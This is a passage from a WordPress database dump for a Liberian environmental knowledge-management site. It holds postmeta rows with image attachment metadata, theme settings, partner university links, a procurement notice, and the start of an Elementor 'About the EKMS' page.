:\"10\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS 4000D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1582809320\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34264,4963,'_thumbnail_id','4965'),(34265,4963,'_edit_last','42'),(34266,4963,'website_link','https://www.auwa.edu.lr/home'),(34267,4963,'_pods_university_logo','a:1:{i:0;i:4964;}'),(34268,4963,'university_logo','4964'),(34269,4966,'_edit_lock','1661263364:42'),(34270,4966,'_last_editor_used_jetpack','block-editor'),(34271,4967,'_wp_attached_file','2022/08/Starz-University-Logo-1.png'),(34272,4967,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:35:\"2022/08/Starz-University-Logo-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Starz-University-Logo-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:34:\"Starz-University-Logo-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34273,4968,'_wp_attached_file','2022/08/starz.jpg'),(34274,4968,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2022/08/starz.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"starz-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"starz-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"starz-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"starz-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"starz-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"starz-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"starz-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"starz-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"starz-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"starz-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"starz-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34275,4966,'_thumbnail_id','4968'),(34276,4966,'_edit_last','42'),(34277,4966,'website_link','https://starzit.com/'),(34278,4966,'_pods_university_logo','a:1:{i:0;i:4967;}'),(34279,4966,'university_logo','4967'),(34280,4969,'_wp_attached_file','2022/08/TERMS-OF-REFERENCE-FOR-VIDEO-DOCUMENTARY-2022.docx'),(34281,4970,'_wp_attached_file','2022/08/Terms-of-Reference-to-procure-and-install-plugins-and-hosting-subscription.docx'),(34282,4971,'_last_editor_used_jetpack','classic-editor'),(34283,4971,'_edit_lock','1661427481:42'),(34284,4971,'_edit_last','42'),(34285,4971,'_wp_page_template','default'),(34286,4971,'_wp_old_date','2022-08-25'),(34287,4971,'closed_date','2022-08-18'),(34288,4971,'owner','EPA'),(34289,4971,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/Terms-of-Reference-to-procure-and-install-plugins-and-hosting-subscription.docx'),(34301,4976,'_edit_lock','1661522471:42'),(34302,4976,'_last_editor_used_jetpack','block-editor'),(34303,4977,'_edit_lock','1661519820:42'),(34304,4977,'_last_editor_used_jetpack','block-editor'),(34305,4978,'_wp_attached_file','2022/08/lla.jpg'),(34306,4978,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/08/lla.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"lla-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"lla-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"lla-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"lla-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"lla-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"lla-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"lla-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"lla-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"lla-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"lla-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"lla-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34309,4977,'_wp_old_date','2022-08-26'),(34310,4977,'_thumbnail_id','4978'),(34311,4977,'_edit_last','42'),(34312,4977,'kava_extra_enable_breadcrumbs','inherit'),(34313,4977,'post_formats',''),(34314,4977,'gallery_tab',''),(34315,4977,'kava_extra_gallery_images',''),(34316,4977,'link_tab',''),(34317,4977,'kava_extra_link',''),(34318,4977,'kava_extra_link_target','_blank'),(34319,4977,'quote_tab',''),(34320,4977,'kava_extra_quote_text',''),(34321,4977,'kava_extra_quote_cite',''),(34322,4977,'audio_tab',''),(34323,4977,'kava_extra_audio',''),(34324,4977,'kava_extra_audio_loop','false'),(34325,4977,'kava_extra_audio_autoplay','false'),(34326,4977,'kava_extra_audio_preload','false'),(34327,4977,'video_tab',''),(34328,4977,'kava_extra_video_type','library'),(34329,4977,'kava_extra_video_library',''),(34330,4977,'kava_extra_video_external',''),(34331,4977,'kava_extra_video_poster',''),(34332,4977,'kava_extra_video_width','770'),(34333,4977,'kava_extra_video_height','480'),(34334,4977,'kava_extra_video_loop','false'),(34335,4977,'kava_extra_video_autoplay','false'),(34336,4977,'kava_extra_video_preload','false'),(34337,4980,'_edit_lock','1661519986:42'),(34338,4980,'_last_editor_used_jetpack','block-editor'),(34339,4981,'_wp_attached_file','2022/08/lla-1.jpg'),(34340,4981,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:486;s:4:\"file\";s:17:\"2022/08/lla-1.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"lla-1-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"lla-1-1024x461.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"lla-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"lla-1-768x346.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"lla-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"lla-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"lla-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"lla-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"lla-1-370x486.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"lla-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"lla-1-600x270.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"lla-1-640x486.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34343,4980,'_wp_old_date','2022-08-26'),(34344,4980,'_thumbnail_id','4981'),(34345,4980,'_edit_last','42'),(34346,4980,'kava_extra_enable_breadcrumbs','inherit'),(34347,4980,'post_formats',''),(34348,4980,'gallery_tab',''),(34349,4980,'kava_extra_gallery_images',''),(34350,4980,'link_tab',''),(34351,4980,'kava_extra_link',''),(34352,4980,'kava_extra_link_target','_blank'),(34353,4980,'quote_tab',''),(34354,4980,'kava_extra_quote_text',''),(34355,4980,'kava_extra_quote_cite',''),(34356,4980,'audio_tab',''),(34357,4980,'kava_extra_audio',''),(34358,4980,'kava_extra_audio_loop','false'),(34359,4980,'kava_extra_audio_autoplay','false'),(34360,4980,'kava_extra_audio_preload','false'),(34361,4980,'video_tab',''),(34362,4980,'kava_extra_video_type','library'),(34363,4980,'kava_extra_video_library',''),(34364,4980,'kava_extra_video_external',''),(34365,4980,'kava_extra_video_poster',''),(34366,4980,'kava_extra_video_width','770'),(34367,4980,'kava_extra_video_height','480'),(34368,4980,'kava_extra_video_loop','false'),(34369,4980,'kava_extra_video_autoplay','false'),(34370,4980,'kava_extra_video_preload','false'),(34371,4983,'_edit_lock','1661520431:42'),(34372,4983,'_last_editor_used_jetpack','block-editor'),(34373,4984,'_wp_attached_file','2022/08/mpw.jpg'),(34374,4984,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/08/mpw.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"mpw-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"mpw-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"mpw-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"mpw-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"mpw-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"mpw-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"mpw-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"mpw-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"mpw-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"mpw-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"mpw-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34377,4983,'_wp_old_date','2022-08-26'),(34378,4983,'_thumbnail_id','4984'),(34379,4983,'_edit_last','42'),(34380,4983,'kava_extra_enable_breadcrumbs','inherit'),(34381,4983,'post_formats',''),(34382,4983,'gallery_tab',''),(34383,4983,'kava_extra_gallery_images',''),(34384,4983,'link_tab',''),(34385,4983,'kava_extra_link',''),(34386,4983,'kava_extra_link_target','_blank'),(34387,4983,'quote_tab',''),(34388,4983,'kava_extra_quote_text',''),(34389,4983,'kava_extra_quote_cite',''),(34390,4983,'audio_tab',''),(34391,4983,'kava_extra_audio',''),(34392,4983,'kava_extra_audio_loop','false'),(34393,4983,'kava_extra_audio_autoplay','false'),(34394,4983,'kava_extra_audio_preload','false'),(34395,4983,'video_tab',''),(34396,4983,'kava_extra_video_type','library'),(34397,4983,'kava_extra_video_library',''),(34398,4983,'kava_extra_video_external',''),(34399,4983,'kava_extra_video_poster',''),(34400,4983,'kava_extra_video_width','770'),(34401,4983,'kava_extra_video_height','480'),(34402,4983,'kava_extra_video_loop','false'),(34403,4983,'kava_extra_video_autoplay','false'),(34404,4983,'kava_extra_video_preload','false'),(34405,4986,'_wp_attached_file','2022/08/mpw-1.jpg'),(34406,4986,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2022/08/mpw-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"mpw-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"mpw-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"mpw-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"mpw-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"mpw-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"mpw-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"mpw-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"mpw-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"mpw-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"mpw-1-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"mpw-1-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34409,4976,'_wp_old_date','2022-08-26'),(34410,4976,'_thumbnail_id','4986'),(34411,4976,'_edit_last','42'),(34412,4976,'kava_extra_enable_breadcrumbs','inherit'),(34413,4976,'post_formats',''),(34414,4976,'gallery_tab',''),(34415,4976,'kava_extra_gallery_images',''),(34416,4976,'link_tab',''),(34417,4976,'kava_extra_link',''),(34418,4976,'kava_extra_link_target','_blank'),(34419,4976,'quote_tab',''),(34420,4976,'kava_extra_quote_text',''),(34421,4976,'kava_extra_quote_cite',''),(34422,4976,'audio_tab',''),(34423,4976,'kava_extra_audio',''),(34424,4976,'kava_extra_audio_loop','false'),(34425,4976,'kava_extra_audio_autoplay','false'),(34426,4976,'kava_extra_audio_preload','false'),(34427,4976,'video_tab',''),(34428,4976,'kava_extra_video_type','library'),(34429,4976,'kava_extra_video_library',''),(34430,4976,'kava_extra_video_external',''),(34431,4976,'kava_extra_video_poster',''),(34432,4976,'kava_extra_video_width','770'),(34433,4976,'kava_extra_video_height','480'),(34434,4976,'kava_extra_video_loop','false'),(34435,4976,'kava_extra_video_autoplay','false'),(34436,4976,'kava_extra_video_preload','false'),(34437,4988,'_edit_lock','1661523339:42'),(34438,4988,'_last_editor_used_jetpack','block-editor'),(34439,4989,'_wp_attached_file','2022/08/mpw-2.jpg'),(34440,4989,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:17:\"2022/08/mpw-2.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"mpw-2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"mpw-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"mpw-2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"mpw-2-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"mpw-2-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"mpw-2-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"mpw-2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"mpw-2-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"mpw-2-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:17:\"mpw-2-960x650.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"mpw-2-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"mpw-2-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:17:\"mpw-2-960x640.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34443,4988,'_wp_old_date','2022-08-26'),(34444,4988,'_thumbnail_id','4989'),(34445,4988,'_edit_last','42'),(34446,4988,'kava_extra_enable_breadcrumbs','inherit'),(34447,4988,'post_formats',''),(34448,4988,'gallery_tab',''),(34449,4988,'kava_extra_gallery_images',''),(34450,4988,'link_tab',''),(34451,4988,'kava_extra_link',''),(34452,4988,'kava_extra_link_target','_blank'),(34453,4988,'quote_tab',''),(34454,4988,'kava_extra_quote_text',''),(34455,4988,'kava_extra_quote_cite',''),(34456,4988,'audio_tab',''),(34457,4988,'kava_extra_audio',''),(34458,4988,'kava_extra_audio_loop','false'),(34459,4988,'kava_extra_audio_autoplay','false'),(34460,4988,'kava_extra_audio_preload','false'),(34461,4988,'video_tab',''),(34462,4988,'kava_extra_video_type','library'),(34463,4988,'kava_extra_video_library',''),(34464,4988,'kava_extra_video_external',''),(34465,4988,'kava_extra_video_poster',''),(34466,4988,'kava_extra_video_width','770'),(34467,4988,'kava_extra_video_height','480'),(34468,4988,'kava_extra_video_loop','false'),(34469,4988,'kava_extra_video_autoplay','false'),(34470,4988,'kava_extra_video_preload','false'),(34480,4993,'_elementor_edit_mode','builder'),(34481,4993,'_elementor_template_type','wp-page'),(34482,4993,'_elementor_version','3.4.0'),(34483,4993,'_wp_page_template','default'),(34484,4993,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\"}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although 